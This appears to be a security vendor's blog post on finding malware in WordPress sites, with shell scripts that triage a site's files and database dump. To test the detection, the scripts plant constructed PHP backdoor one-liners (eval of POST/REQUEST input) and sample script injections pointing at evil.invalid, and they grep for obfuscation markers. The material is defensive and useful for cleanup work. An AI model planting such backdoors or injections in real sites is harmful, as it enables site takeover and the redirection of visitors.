Tips to find malware in WordPress websites

Sep 14, 2020

WordPress has always been a favourite target of website attackers, so it is one of the web applications that receives the most attacks. On a shared hosting server this is easy to see: compare the access logs of the WordPress sites against those of the other sites on the same server. The result is usually self-explanatory, with a large volume of brute-force login attempts, generic attacks and targeted attempts to exploit WordPress itself, its plugins and its themes. The rate of attack attempts against WordPress sites is far higher than against other web applications on the same box.

Where you can find the infections 

There are many ways to exploit a WordPress website, and new attacks and vulnerabilities are reported all the time. Once a site has been compromised, the injected code is usually found in one of two places:

1. The file system where the website files are stored
2. The database associated with the website

In both cases the attacker adds code of their own (a backdoor, a spam injector, a redirect) so that their logic runs inside the compromised website.

1. How to find hacked WordPress Files

The attacker usually modifies existing files or uploads new ones carrying the malicious code. The plugins, themes and uploads directories are the most common targets, but the infection is not limited to those locations. For a manual lookup, start with the following steps:

  • Check the DocumentRoot of the website and make sure there are no unknown files or folders. Anything with a gibberish name deserves a specific look.
  • Check the wp-content/plugins directory and make sure there is no plugin directory that you did not install. Also list the most recently modified PHP files under the plugins folder and verify each one.
  • Check the wp-content/themes directory and make sure there is no theme directory that you did not install. Also list the most recently modified PHP files under the themes folder and verify each one.
  • Make sure no PHP or other interpreted files exist under wp-content/uploads. That folder is meant for media only and should never execute code; blocking PHP execution there in the web server configuration is a good preventive measure.
  • Use the wp-cli tool to check the integrity of the core and plugin files against the official checksums (wp core verify-checksums and wp plugin verify-checksums; see the wp-cli documentation for usage). Note that files the verifier does not know about (extra files, not listed in the checksum manifest) are reported separately and still need manual review.
  • You can use a WordPress security plugin such as Wordfence to scan for other hidden hacked files under the website. 
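The manual file-system steps above, collected into a small POSIX shell script (an added example, not code from the original article or from cPGuard). It builds a constructed WordPress-like tree with two planted files so it runs offline; on a real site you would pass the actual DocumentRoot to the functions instead. Plugin slugs, file names and the obfuscation markers are assumptions for illustration; the marker grep is a triage list, not a verdict, since legitimate plugins also call base64_decode().

```shell
#!/bin/sh
# Added example: manual file-system triage of a WordPress docroot.

# Constructed sample tree (not a real site) with two planted files.
make_sample_site() {
  root=$(mktemp -d)
  mkdir -p "$root/wp-content/plugins/akismet" \
           "$root/wp-content/themes/twentytwenty" \
           "$root/wp-content/uploads/2020/09"
  printf '<?php // legitimate plugin file\n' > "$root/wp-content/plugins/akismet/akismet.php"
  printf '<?php // legitimate theme file\n'  > "$root/wp-content/themes/twentytwenty/functions.php"
  printf 'GIF89a' > "$root/wp-content/uploads/2020/09/photo.gif"
  # planted: PHP dropped into uploads under a gibberish name (constructed)
  printf '<?php eval(base64_decode($_POST["x"]));\n' > "$root/wp-content/uploads/2020/09/x7fkq.php"
  # planted: unknown plugin directory carrying a one-line backdoor (constructed)
  mkdir -p "$root/wp-content/plugins/wp-zzz"
  printf '<?php @eval($_REQUEST["c"]);\n' > "$root/wp-content/plugins/wp-zzz/index.php"
  echo "$root"
}

# Interpreted files under uploads: there should be none. $1 = docroot
find_code_in_uploads() {
  find "$1/wp-content/uploads" -type f \
    \( -name '*.php' -o -name '*.phtml' -o -name '*.php[0-9]' -o -name '*.phar' \)
}

# PHP files under plugins/themes modified in the last N days. $1 = docroot, $2 = days
recently_modified_php() {
  find "$1/wp-content/plugins" "$1/wp-content/themes" -type f -name '*.php' -mtime "-$2"
}

# Plugin directories not in an allowlist of slugs you installed.
# $1 = docroot, $2 = newline-separated allowlist
unknown_plugin_dirs() {
  for d in "$1"/wp-content/plugins/*/; do
    [ -d "$d" ] || continue
    slug=$(basename "$d")
    echo "$2" | grep -qx "$slug" || echo "$slug"
  done
}

# Files carrying common obfuscation / code-execution markers (triage only). $1 = docroot
suspicious_php() {
  grep -rlE --include='*.php' \
    'eval\(|assert\(|base64_decode\(|gzinflate\(|str_rot13\(|create_function\(' "$1"
}

# Stand-alone run against the constructed tree. On a real site, additionally run
# "wp core verify-checksums" and "wp plugin verify-checksums --all" from the docroot.
ROOT=$(make_sample_site)
echo "== PHP files in uploads";          find_code_in_uploads "$ROOT"
echo "== PHP changed in last 7 days";    recently_modified_php "$ROOT" 7
echo "== plugin dirs not in allowlist";  unknown_plugin_dirs "$ROOT" "akismet"
echo "== obfuscation markers";           suspicious_php "$ROOT"
rm -rf "$ROOT"
```

Each function prints paths only, so the output can be fed straight into a ticket or diffed against a previous run; the recently-modified listing is most useful when you know roughly when the site was last legitimately updated.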

2. How to find hacked WordPress Database contents

This is trickier than finding compromised files, because tracking injected code in the database takes more manual effort. Take a backup of the current database before changing anything in it. To start the investigation, do the following:

  • Check the WordPress admin user list and make sure it contains no unknown users. Administrator rights live in the wp_usermeta table (the wp_capabilities key), so check that table and not only wp_users.
  • Take a dump of the database and search it for the suspicious content (spammy keywords, links, redirects) that you have seen on the website.
  • Check the post contents (wp_posts) and note any injected JavaScript, such as script or iframe tags that you did not add.
  • Look into the wp_options table and make sure there are no unexpected entries. Pay particular attention to siteurl, home, active_plugins and the cron option, since attackers change these to redirect the site, load a rogue plugin or keep a scheduled task alive.
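The database steps above, run over a mysqldump-style dump file with plain shell tools (an added example, not code from the original article or from cPGuard). It assumes a dump written with one row per INSERT statement (the --skip-extended-insert style of mysqldump); the sample dump below is constructed, with abbreviated column lists, and the second administrator, the spam post and the rogue option are planted for illustration.

```shell
#!/bin/sh
# Added example: triage of a WordPress database dump from the shell.

# Constructed sample dump (not from a real site); columns are abbreviated.
make_sample_dump() {
  f=$(mktemp)
  cat > "$f" <<'EOF'
INSERT INTO `wp_users` VALUES (1,'admin','$P$Bhash','admin','admin@example.com','','2020-01-01 00:00:00','',0,'admin');
INSERT INTO `wp_users` VALUES (2,'wp_support','$P$Bhash','wp_support','x@mail.invalid','','2020-09-10 03:12:44','',0,'wp_support');
INSERT INTO `wp_usermeta` VALUES (10,1,'wp_capabilities','a:1:{s:13:"administrator";b:1;}');
INSERT INTO `wp_usermeta` VALUES (11,2,'wp_capabilities','a:1:{s:13:"administrator";b:1;}');
INSERT INTO `wp_posts` VALUES (5,1,'2020-01-02 00:00:00','Hello world','hello-world');
INSERT INTO `wp_posts` VALUES (6,1,'2020-09-11 00:00:00','Buy cheap viagra <script src="http://evil.invalid/a.js"></script>','offer');
INSERT INTO `wp_options` VALUES (1,'siteurl','https://example.com','yes');
INSERT INTO `wp_options` VALUES (400,'wp_8f2a1','<script>window.location="http://evil.invalid/"</script>','yes');
EOF
  echo "$f"
}

# Logins of every user whose wp_capabilities meta grants administrator. $1 = dump file
list_admin_users() {
  grep 'INSERT INTO `wp_usermeta`' "$1" | grep 'wp_capabilities' | grep 'administrator' \
    | sed -E 's/.*VALUES \([0-9]+,([0-9]+),.*/\1/' \
    | while read -r uid; do
        grep "INSERT INTO \`wp_users\` VALUES ($uid," "$1" \
          | sed -E "s/.*VALUES \([0-9]+,'([^']*)'.*/\1/"
      done
}

# IDs of posts whose content carries script/iframe/eval injections. $1 = dump file
injected_posts() {
  grep 'INSERT INTO `wp_posts`' "$1" | grep -iE '<script|<iframe|eval\(' \
    | sed -E 's/.*VALUES \(([0-9]+),.*/\1/'
}

# option_name of wp_options rows whose value carries script or encoded payloads. $1 = dump file
suspicious_options() {
  grep 'INSERT INTO `wp_options`' "$1" | grep -iE '<script|<iframe|base64_decode|eval\(' \
    | sed -E "s/.*VALUES \([0-9]+,'([^']*)'.*/\1/"
}

# Number of rows matching a spam keyword regex (case-insensitive). $1 = dump file, $2 = regex
spam_hits() {
  grep -ciE "$2" "$1"
}

# Stand-alone run against the constructed dump; point the functions at a real dump instead.
DUMP=$(make_sample_dump)
echo "== administrators";              list_admin_users "$DUMP"
echo "== posts with injected markup";  injected_posts "$DUMP"
echo "== suspicious wp_options rows";  suspicious_options "$DUMP"
echo "== spam keyword hits";           spam_hits "$DUMP" 'viagra|casino|payday'
rm -f "$DUMP"
```

Working on a dump rather than the live database keeps the investigation read-only, which matters since the article asks you to back up before touching anything; once an unknown administrator or a rogue option is confirmed, remove it through the WordPress admin or a deliberate UPDATE/DELETE against the live database, not by editing the dump.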

As mentioned already, this needs some expertise; if you are not comfortable doing it, get an expert to do it for you. 

How to automate these checks for your website?

Searching your files and database for malicious code is not easy, and doing it regularly is harder still. If you own a single website, you can rely on a security plugin or a cloud-based scanner to check your website on a schedule and report any bad files. You can also choose a hosting platform with automatic malware checks enabled (cPGuard does this, along with WAF protection specifically for WordPress websites), which protects your website without any additional installation or cost. If you run a server, installing an anti-malware scanner is essential to protect your customers' websites from such attacks and to preserve your server's reputation.

cPGuard contains built-in tools to protect your WordPress websites, and its WAF module has explicit rules to stop attacks against WordPress and its components. Our distributed network helps us detect the latest attack attempts, keep the software up to date and defend against the latest WordPress attacks.